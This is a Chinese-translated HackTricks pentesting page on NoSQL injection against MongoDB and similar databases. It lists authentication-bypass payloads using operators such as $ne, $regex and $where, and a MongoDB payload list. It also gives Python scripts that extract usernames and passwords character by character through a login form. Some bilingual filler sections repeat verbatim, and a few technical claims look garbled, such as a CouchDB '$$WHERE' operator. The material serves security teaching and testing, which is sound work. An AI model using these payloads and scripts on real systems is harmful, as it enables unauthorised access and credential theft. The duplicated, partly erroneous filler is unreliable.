hacktricks/pentesting-web/nosql-injection.md

# NoSQL注入

<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>

\
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和自动化由全球**最先进**的社区工具提供支持的工作流程。\
立即获取访问权限：

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* 你在**网络安全公司**工作吗？想要在HackTricks中看到你的**公司广告**吗？或者你想要访问**PEASS的最新版本或下载PDF格式的HackTricks**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)，或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**

</details>

NoSQL数据库提供比传统SQL数据库更宽松的一致性限制。通过减少关系约束和一致性检查，NoSQL数据库通常提供性能和扩展性的优势。然而，即使它们不使用传统的SQL语法，这些数据库仍然可能受到注入攻击的影响。

## Exploit

在PHP中，您可以通过将发送的参数从_parameter=foo_更改为_parameter\[arrName]=foo_来发送一个数组。

这些漏洞是基于添加一个**运算符**：
```bash
username[$ne]=1$password[$ne]=1 #<Not Equals>
username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
username[$regex]=.{25}&pass[$ne]=1 #Use the <regex> to find the length of a value
username[$eq]=admin&password[$ne]=1 #<Equals>
username[$ne]=admin&pass[$lt]=s #<Less than>, Brute-force pass[$lt] to find more users
username[$ne]=admin&pass[$gt]=s #<Greater Than>
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code
```
### 基本身份验证绕过

**使用不等于 ($ne) 或大于 ($gt)**
```bash
#in URL
username[$ne]=toto&password[$ne]=toto
username[$regex]=.*&password[$regex]=.*
username[$exists]=true&password[$exists]=true

#in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
```
### **SQL - Mongo**

### **SQL注入攻击 - Mongo**

NoSQL databases, such as MongoDB, are becoming increasingly popular due to their flexibility and scalability. However, just like SQL databases, NoSQL databases are also vulnerable to injection attacks.

非关系型数据库（如MongoDB）由于其灵活性和可扩展性而越来越受欢迎。然而，与SQL数据库一样，非关系型数据库也容易受到注入攻击的威胁。

#### **What is NoSQL Injection?**

#### **什么是NoSQL注入攻击？**

NoSQL injection is a type of attack where an attacker exploits vulnerabilities in a NoSQL database query to manipulate or extract data from the database. This can occur when user input is not properly sanitized or validated before being used in a database query.

NoSQL注入是一种攻击类型，攻击者利用非关系型数据库查询中的漏洞来操纵或提取数据库中的数据。当用户输入在被用于数据库查询之前没有经过适当的清理或验证时，就会发生这种情况。

#### **Common NoSQL Injection Techniques**

#### **常见的NoSQL注入技术**

1. **Boolean-based Injection**: This technique involves exploiting boolean-based queries to infer information from the database. By manipulating the query conditions, an attacker can determine if a query is true or false, and use this information to extract data.

1. **基于布尔的注入**：这种技术涉及利用基于布尔的查询来推断数据库中的信息。通过操纵查询条件，攻击者可以确定查询是真还是假，并利用这些信息来提取数据。

2. **Time-based Injection**: In this technique, an attacker introduces time delays in the query to determine if a condition is true or false. By measuring the time it takes for a query to execute, an attacker can extract data from the database.

2. **基于时间的注入**：在这种技术中，攻击者在查询中引入时间延迟，以确定条件是真还是假。通过测量查询执行所需的时间，攻击者可以从数据库中提取数据。

3. **Error-based Injection**: This technique involves exploiting error messages returned by the database to extract information. By injecting malicious input, an attacker can trigger database errors that reveal sensitive data.

3. **基于错误的注入**：这种技术涉及利用数据库返回的错误消息来提取信息。通过注入恶意输入，攻击者可以触发揭示敏感数据的数据库错误。

#### **Preventing NoSQL Injection**

#### **预防NoSQL注入攻击**

To prevent NoSQL injection attacks, it is important to follow secure coding practices:

为了防止NoSQL注入攻击，遵循安全编码实践非常重要：

1. **Input Validation**: Always validate and sanitize user input before using it in a database query. This includes checking for special characters and using parameterized queries or prepared statements.

1. **输入验证**：在使用用户输入进行数据库查询之前，始终验证和清理用户输入。这包括检查特殊字符，并使用参数化查询或预编译语句。

2. **Least Privilege**: Ensure that the database user account used by the application has the least privileges necessary to perform its functions. Limiting the privileges reduces the potential impact of an injection attack.

2. **最小权限原则**：确保应用程序使用的数据库用户帐户具有执行其功能所需的最低权限。限制权限可以减少注入攻击的潜在影响。

3. **Error Handling**: Avoid displaying detailed error messages to users, as they can provide valuable information to attackers. Instead, log the errors internally and display generic error messages to users.

3. **错误处理**：避免向用户显示详细的错误消息，因为这些消息可能为攻击者提供有价值的信息。相反，将错误记录在内部，并向用户显示通用的错误消息。

By implementing these practices, you can significantly reduce the risk of NoSQL injection attacks and protect your NoSQL database from unauthorized access or data leakage.

通过实施这些实践，您可以显著降低NoSQL注入攻击的风险，并保护非关系型数据库免受未经授权的访问或数据泄露的威胁。
```
Normal sql: ' or 1=1-- -
Mongo sql: ' || 1==1//    or    ' || 1==1%00
```
### 提取**长度**信息

In NoSQL injection attacks, it is often useful to extract information about the length of a particular field or parameter. This can help in understanding the structure of the database and crafting further attacks.

在NoSQL注入攻击中，提取特定字段或参数的长度信息通常很有用。这有助于理解数据库的结构并构造进一步的攻击。

To extract the length of a field, you can use the `$where` operator in MongoDB or the `$$WHERE` operator in CouchDB. These operators allow you to execute JavaScript code on the server-side.

要提取字段的长度，可以在MongoDB中使用`$where`运算符或在CouchDB中使用`$$WHERE`运算符。这些运算符允许在服务器端执行JavaScript代码。

Here is an example of extracting the length of a field in MongoDB:

以下是在MongoDB中提取字段长度的示例：

```javascript
db.collection.find({ $where: "this.field.length == 10" })
```

And here is an example for CouchDB:

以下是CouchDB的示例：

```javascript
db.view('design_doc/view_name', { keys: ["param"], $$WHERE: "param.length == 10" })
```

By manipulating the length condition, you can extract different information about the field or parameter. For example, you can check if the length is greater than a certain value, less than a certain value, or equal to a specific length.

通过操作长度条件，可以提取有关字段或参数的不同信息。例如，可以检查长度是否大于某个特定值、小于某个特定值或等于特定长度。

Keep in mind that extracting length information alone may not be enough to fully exploit a NoSQL injection vulnerability. It is often necessary to combine this technique with other attack vectors to achieve a successful exploitation.

请记住，仅提取长度信息可能不足以充分利用NoSQL注入漏洞。通常需要将此技术与其他攻击向量结合起来，以实现成功的利用。
```bash
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
# True if the length equals 1,3...
```
### 提取**数据**信息

NoSQL databases, such as MongoDB, use a different query language than traditional SQL databases. This means that traditional SQL injection techniques may not work against NoSQL databases. However, NoSQL databases are still vulnerable to a type of injection attack known as NoSQL injection.

NoSQL injection occurs when untrusted user input is directly concatenated into a NoSQL query without proper sanitization or validation. This can allow an attacker to manipulate the query and extract sensitive data from the database.

To extract data from a NoSQL database using injection, you can use techniques similar to those used in SQL injection attacks. The goal is to manipulate the query in a way that allows you to bypass authentication, retrieve data from other users, or extract sensitive information.

Here are some common techniques used in NoSQL injection attacks:

1. **Boolean-based technique**: This technique involves injecting a condition that always evaluates to true, allowing you to retrieve data that would not normally be accessible.

2. **Time-based technique**: This technique involves injecting a delay into the query, allowing you to infer information based on the response time of the query.

3. **Error-based technique**: This technique involves injecting a query that intentionally causes an error, revealing information about the structure of the database or the query itself.

4. **Blind technique**: This technique involves injecting a query that does not produce a visible response, but allows you to infer information based on the behavior of the application.

To protect against NoSQL injection attacks, it is important to properly sanitize and validate user input before using it in a query. This can include techniques such as parameterized queries, input validation, and output encoding.

By understanding and applying these techniques, you can effectively extract data from NoSQL databases using injection attacks. However, it is important to note that performing such attacks without proper authorization is illegal and unethical. Always ensure you have the necessary permissions and legal authorization before conducting any penetration testing activities.
```
in URL (if length == 3)
username[$ne]=toto&password[$regex]=a.{2}
username[$ne]=toto&password[$regex]=b.{2}
...
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp

username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*

in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```
### **SQL - Mongo**

### **SQL注入攻击 - Mongo**

NoSQL databases, such as MongoDB, are becoming increasingly popular due to their flexibility and scalability. However, just like SQL databases, NoSQL databases are also vulnerable to injection attacks.

非关系型数据库（如MongoDB）由于其灵活性和可扩展性而越来越受欢迎。然而，与SQL数据库一样，非关系型数据库也容易受到注入攻击的威胁。

#### **What is NoSQL Injection?**

#### **什么是NoSQL注入攻击？**

NoSQL injection is a type of attack where an attacker exploits vulnerabilities in a NoSQL database query to manipulate or extract data from the database. This can occur when user input is not properly sanitized or validated before being used in a database query.

NoSQL注入是一种攻击类型，攻击者利用非关系型数据库查询中的漏洞来操纵或提取数据库中的数据。当用户输入在被用于数据库查询之前没有经过适当的清理或验证时，就可能发生这种情况。

#### **Common NoSQL Injection Techniques**

#### **常见的NoSQL注入技术**

1. **Boolean-based Injection**: This technique involves exploiting boolean-based queries to infer information from the database. By manipulating the query conditions, an attacker can determine if a query is true or false, and use this information to extract data.

1. **基于布尔的注入**：这种技术涉及利用基于布尔的查询来推断数据库中的信息。通过操纵查询条件，攻击者可以确定查询是真还是假，并利用这些信息来提取数据。

2. **Time-based Injection**: In this technique, an attacker introduces time delays in the query to determine if a condition is true or false. By measuring the time it takes for a query to execute, an attacker can extract data from the database.

2. **基于时间的注入**：在这种技术中，攻击者在查询中引入时间延迟，以确定条件是真还是假。通过测量查询执行所需的时间，攻击者可以从数据库中提取数据。

3. **Error-based Injection**: This technique involves exploiting error messages returned by the database to extract information. By injecting malicious input, an attacker can trigger database errors that reveal sensitive data.

3. **基于错误的注入**：这种技术涉及利用数据库返回的错误消息来提取信息。通过注入恶意输入，攻击者可以触发揭示敏感数据的数据库错误。

#### **Preventing NoSQL Injection**

#### **预防NoSQL注入攻击**

To prevent NoSQL injection attacks, it is important to follow secure coding practices:

为了防止NoSQL注入攻击，遵循安全编码实践非常重要：

1. **Input Validation**: Always validate and sanitize user input before using it in a database query. This includes checking for special characters and using parameterized queries or prepared statements.

1. **输入验证**：在使用用户输入进行数据库查询之前，始终验证和清理用户输入。这包括检查特殊字符，并使用参数化查询或预编译语句。

2. **Least Privilege**: Ensure that the database user account used by the application has the least privileges necessary to perform its functions. Limiting the privileges reduces the potential impact of an injection attack.

2. **最小权限原则**：确保应用程序使用的数据库用户帐户具有执行其功能所需的最低权限。限制权限可以减少注入攻击的潜在影响。

3. **Error Handling**: Avoid displaying detailed error messages to users, as they can provide valuable information to attackers. Instead, log the errors internally and display generic error messages to users.

3. **错误处理**：避免向用户显示详细的错误消息，因为这些消息可能为攻击者提供有价值的信息。相反，将错误记录在内部，并向用户显示通用的错误消息。

By implementing these practices, you can significantly reduce the risk of NoSQL injection attacks and protect your NoSQL database from unauthorized access or data leakage.

通过实施这些实践，您可以显著降低NoSQL注入攻击的风险，并保护非关系型数据库免受未经授权的访问或数据泄露的威胁。
```
/?search=admin' && this.password%00 --> Check if the field password exists
/?search=admin' && this.password && this.password.match(/.*/)%00 --> start matching password
/?search=admin' && this.password && this.password.match(/^a.*$/)%00
/?search=admin' && this.password && this.password.match(/^b.*$/)%00
/?search=admin' && this.password && this.password.match(/^c.*$/)%00
...
/?search=admin' && this.password && this.password.match(/^duvj.*$/)%00
...
/?search=admin' && this.password && this.password.match(/^duvj78i3u$/)%00  Found
```
### PHP任意函数执行

使用[MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite)库的**$func**运算符（默认使用）可能会导致执行任意函数，就像[这个报告](https://swarm.ptsecurity.com/rce-cockpit-cms/)中所述。
```python
"user":{"$func": "var_dump"}
```
![](<../.gitbook/assets/image (468).png>)

### 从不同的集合中获取信息

可以使用[$lookup](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/)从不同的集合中获取信息。在下面的示例中，我们从一个名为`users`的**不同集合**中读取数据，并获取所有密码与通配符匹配的条目的结果。
```json
[
{
"$lookup":{
"from": "users",
"as":"resultado","pipeline": [
{
"$match":{
"password":{
"$regex":"^.*"
}
}
}
]
}
}
]
```
<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>

使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)轻松构建和自动化由全球**最先进**的社区工具提供支持的工作流程。
立即获取访问权限：

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

## 盲注攻击（Blind NoSQL）
```python
import requests, string

alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(21):
print("[i] Looking for char number "+str(i+1))
for char in alphabet:
r = requests.get("http://chall.com?param=^"+flag+char)
if ("<TRUE>" in r.text):
flag += char
print("[+] Flag: "+flag)
break
```

```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

username="admin"
password=""

while True:
for c in string.printable:
if c not in ['*','+','.','?','|']:
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
r = requests.post(u, data = {'ids': payload}, verify = False)
if 'OK' in r.text:
print("Found one more char : %s" % (password+c))
password += c
```
## MongoDB攻击载荷

### NoSQL Injection

### NoSQL注入

NoSQL injection is a type of attack that targets NoSQL databases, such as MongoDB. It occurs when an attacker is able to manipulate a query in order to retrieve or modify data that they should not have access to.

NoSQL注入是一种针对NoSQL数据库（如MongoDB）的攻击类型。当攻击者能够操纵查询以检索或修改他们不应该访问的数据时，就会发生这种情况。

In MongoDB, the query language is based on JSON-like syntax. This means that the attacker can exploit the lack of input validation and inject malicious payloads into the query.

在MongoDB中，查询语言基于类似JSON的语法。这意味着攻击者可以利用输入验证的缺失，并将恶意载荷注入到查询中。

### Basic NoSQL Injection Payloads

### 基本的NoSQL注入载荷

Here are some basic payloads that can be used to perform NoSQL injection attacks in MongoDB:

以下是一些基本的载荷，可用于在MongoDB中执行NoSQL注入攻击：

#### 1. Simple Payload

#### 1. 简单载荷

```javascript
{"$ne": null}
```

#### 2. Logical Operators

#### 2. 逻辑运算符

```javascript
{"$gt": ""}
{"$gte": ""}
{"$lt": ""}
{"$lte": ""}
```

#### 3. Regular Expression

#### 3. 正则表达式

```javascript
{"$regex": ""}
```

#### 4. Boolean-based Injection

#### 4. 基于布尔的注入

```javascript
{"$where": "this.username.match(/.*/)//"}
```

#### 5. Time-based Injection

#### 5. 基于时间的注入

```javascript
{"$where": "sleep(1000)"}
```

These payloads can be used to manipulate the query and retrieve sensitive information or perform unauthorized modifications.

这些载荷可用于操纵查询并检索敏感信息或执行未经授权的修改。

### Advanced NoSQL Injection Payloads

### 高级NoSQL注入载荷

In addition to the basic payloads, there are also advanced payloads that can be used to perform more complex NoSQL injection attacks:

除了基本的载荷外，还有一些高级载荷可用于执行更复杂的NoSQL注入攻击：

#### 1. Blind Injection

#### 1. 盲注入

```javascript
{"$where": "sleep(1000) && this.password.match(/^a.*$/)//"}
```

#### 2. Time-based Blind Injection

#### 2. 基于时间的盲注入

```javascript
{"$where": "this.username.match(/^a.*$/) && sleep(1000)"}
```

#### 3. Out-of-Band Injection

#### 3. 带外注入

```javascript
{"$where": "db.coll.insert({data: this.username})"}
```

These advanced payloads allow the attacker to extract data even when the application does not provide any visible response.

这些高级载荷允许攻击者在应用程序没有提供任何可见响应时提取数据。

### Conclusion

### 结论

NoSQL injection is a serious security vulnerability that can lead to unauthorized access and data leakage in MongoDB and other NoSQL databases. It is important for developers and security professionals to understand and mitigate this risk by implementing proper input validation and sanitization techniques.

NoSQL注入是MongoDB和其他NoSQL数据库中可能导致未经授权访问和数据泄露的严重安全漏洞。开发人员和安全专业人员通过实施适当的输入验证和净化技术，了解并减轻这种风险非常重要。
```
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
```
## 工具

* [https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration](https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration)
* [https://github.com/C4l1b4n/NoSQL-Attack-Suite](https://github.com/C4l1b4n/NoSQL-Attack-Suite)

### 从POST登录中暴力破解用户名和密码

这是一个简单的脚本，你可以修改它，但之前的工具也可以完成这个任务。
```python
import requests
import string

url = "http://example.com"
headers = {"Host": "exmaple.com"}
cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"}
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]
def get_password(username):
print("Extracting password of "+username)
params = {"username":username, "password[$regex]":"", "login": "login"}
password = "^"
while True:
for c in possible_chars:
params["password[$regex]"] = password + c + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
password += c
break
if c == possible_chars[-1]:
print("Found password "+password[1:].replace("\\", "")+" for username "+username)
return password[1:].replace("\\", "")

def get_usernames():
usernames = []
params = {"username[$regex]":"", "password[$regex]":".*", "login": "login"}
for c in possible_chars:
username = "^" + c
params["username[$regex]"] = username + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
print("Found username starting with "+c)
while True:
for c2 in possible_chars:
params["username[$regex]"] = username + c2 + ".*"
if int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302:
username += c2
print(username)
break

if c2 == possible_chars[-1]:
print("Found username: "+username[1:])
usernames.append(username[1:])
break
return usernames


for u in get_usernames():
get_password(u)
```
## 参考资料

* [https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media](https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* 你在一个**网络安全公司**工作吗？你想在HackTricks中看到你的**公司广告**吗？或者你想要**获取最新版本的PEASS或下载PDF格式的HackTricks**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**

</details>

<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>

\
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和**自动化工作流程**，使用全球**最先进**的社区工具。\
立即获取访问权限：

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}